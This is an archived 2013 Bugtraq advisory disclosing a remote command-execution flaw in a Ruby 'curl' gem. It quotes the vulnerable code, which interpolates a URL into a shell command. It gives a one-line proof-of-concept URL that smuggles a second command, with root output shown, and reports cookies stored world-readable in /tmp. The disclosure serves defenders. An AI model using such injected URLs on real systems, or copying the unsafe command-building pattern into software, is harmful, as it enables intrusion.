lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201303151409.r2FE9SYh006476@sf01web2.securityfocus.com>
Date: Fri, 15 Mar 2013 14:09:28 GMT
From: Larry0@...com
To: bugtraq@...urityfocus.com
Subject: Curl Ruby Gem Remote command execution

Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb the following lines:

131       cmd = "curl #{cookies_store} #{browser_type} #{@...up_params} {ref}  \"{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)
PoC
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")

larry@...erfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org

This gem also stores cookie data insecurely in /tmp:
root@...erfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@...erfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@...erfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@...erfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426199640	PREF	ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com	TRUE	/	FALSE	1378938840	NID	67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426198990	PREF	ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com	TRUE	/	FALSE	1378938190	NID	67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@...erfl0w:/tmp# 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ